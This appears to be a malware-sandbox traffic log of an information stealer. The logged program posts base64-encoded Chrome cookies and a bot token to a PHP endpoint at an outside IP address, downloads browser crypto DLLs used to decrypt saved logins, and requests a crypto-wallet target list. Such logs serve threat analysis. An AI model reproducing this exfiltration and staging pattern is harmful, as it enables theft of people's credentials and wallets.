00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 27, 2024 00:15:01.006648064 CEST	950	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA Host: 46.8.231.109 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------JDHIEBFHCAKEHIDGHCBA--
Sep 27, 2024 00:15:01.195985079 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 00:15:01.283544064 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFB Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="file"------GCAEHDBAAECBFHJKFCFB--
Sep 27, 2024 00:15:01.471174955 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 00:15:02.419406891 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file"------JKEHIIJJECFHJKECFHDG--
Sep 27, 2024 00:15:02.718255997 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="file"------JKEHIIJJECFHJKECFHDG--
Sep 27, 2024 00:15:03.048238993 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 00:15:03.356029987 CEST	91	OUT	GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 27, 2024 00:15:03.529639006 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:03 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 27, 2024 00:15:04.163655996 CEST	91	OUT	GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 27, 2024 00:15:04.335304976 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:04 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 27, 2024 00:15:05.647479057 CEST	92	OUT	GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 27, 2024 00:15:05.818850040 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 27, 2024 00:15:06.195856094 CEST	88	OUT	GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 27, 2024 00:15:06.370893002 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:06 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 27, 2024 00:15:07.773509979 CEST	92	OUT	GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 27, 2024 00:15:07.947653055 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:07 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 27, 2024 00:15:08.153973103 CEST	96	OUT	GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 27, 2024 00:15:08.327542067 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:08 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 27, 2024 00:15:08.497138977 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC Host: 46.8.231.109 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 00:15:08.803961992 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 00:15:08.826977015 CEST	466	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBAAEBKEGHIEBFIJJK Host: 46.8.231.109 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 31 61 33 30 66 66 38 63 61 39 33 30 34 66 33 30 32 33 34 61 33 65 32 38 39 37 32 38 63 65 35 62 39 64 66 30 33 61 63 35 38 66 33 64 62 37 63 64 36 37 38 37 36 35 34 35 35 34 65 62 66 61 61 32 30 34 62 32 34 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 41 41 45 42 4b 45 47 48 49 45 42 46 49 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="token"061a30ff8ca9304f30234a3e289728ce5b9df03ac58f3db7cd6787654554ebfaa204b244------CFCBAAEBKEGHIEBFIJJKContent-Disposition: form-data; name="message"wallets------CFCBAAEBKEGHIEBFIJJK--
Sep 27, 2024 00:15:09.001775026 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: 